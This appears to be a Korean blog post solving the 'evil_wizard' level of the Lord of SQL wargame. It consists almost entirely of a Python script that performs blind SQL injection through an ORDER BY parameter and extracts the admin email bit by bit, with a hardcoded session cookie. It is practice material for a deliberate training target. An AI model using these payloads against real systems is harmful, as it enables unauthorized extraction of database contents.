import requests
def request(payload):
url = "http://los.rubiya.kr/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
params = {'order':payload}
headers = {'Cookie':'PHPSESSID=cjuc8f1iu5f7ooe4ktnrgdv565'}
response = requests.get(url,params=params,headers=headers)
if "h>email</th><th>score</th><tr><td>admin</td" in response.text:
return True
else:
return False
length = 0
for i in range(0,100):
payload = "if(score=50 and length(email)="+str(i)+",score,999)"
if request(payload) == True:
length = i
print "Find Admin Email Length[*] = " + str(length)
admin_email = ""
for i in range(1,length+1):
binary = ""
for j in range(1,9):
payload = "if(score=50 and substring(lpad(bin(ord(substring(email,"+str(i)+",1))),8,0),"+str(j)+",1)=1,score,999)"
if request(payload) == True:
binary += "1"
else:
binary += "0"
if binary != "00000000":
admin_email += chr(int(binary,2))
print "Find Admin Email[*] = " + str(admin_email)
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS2 red_dragon (0) | 2018.10.10 |
|---|---|
| LOS2 green_dragon (0) | 2018.10.10 |
| LOS2 hell_fire (0) | 2018.10.10 |
| LOS All Clear (0) | 2018.02.09 |
| LOS umaru (0) | 2018.02.09 |
JeonYoungSin
메모 기록용 공간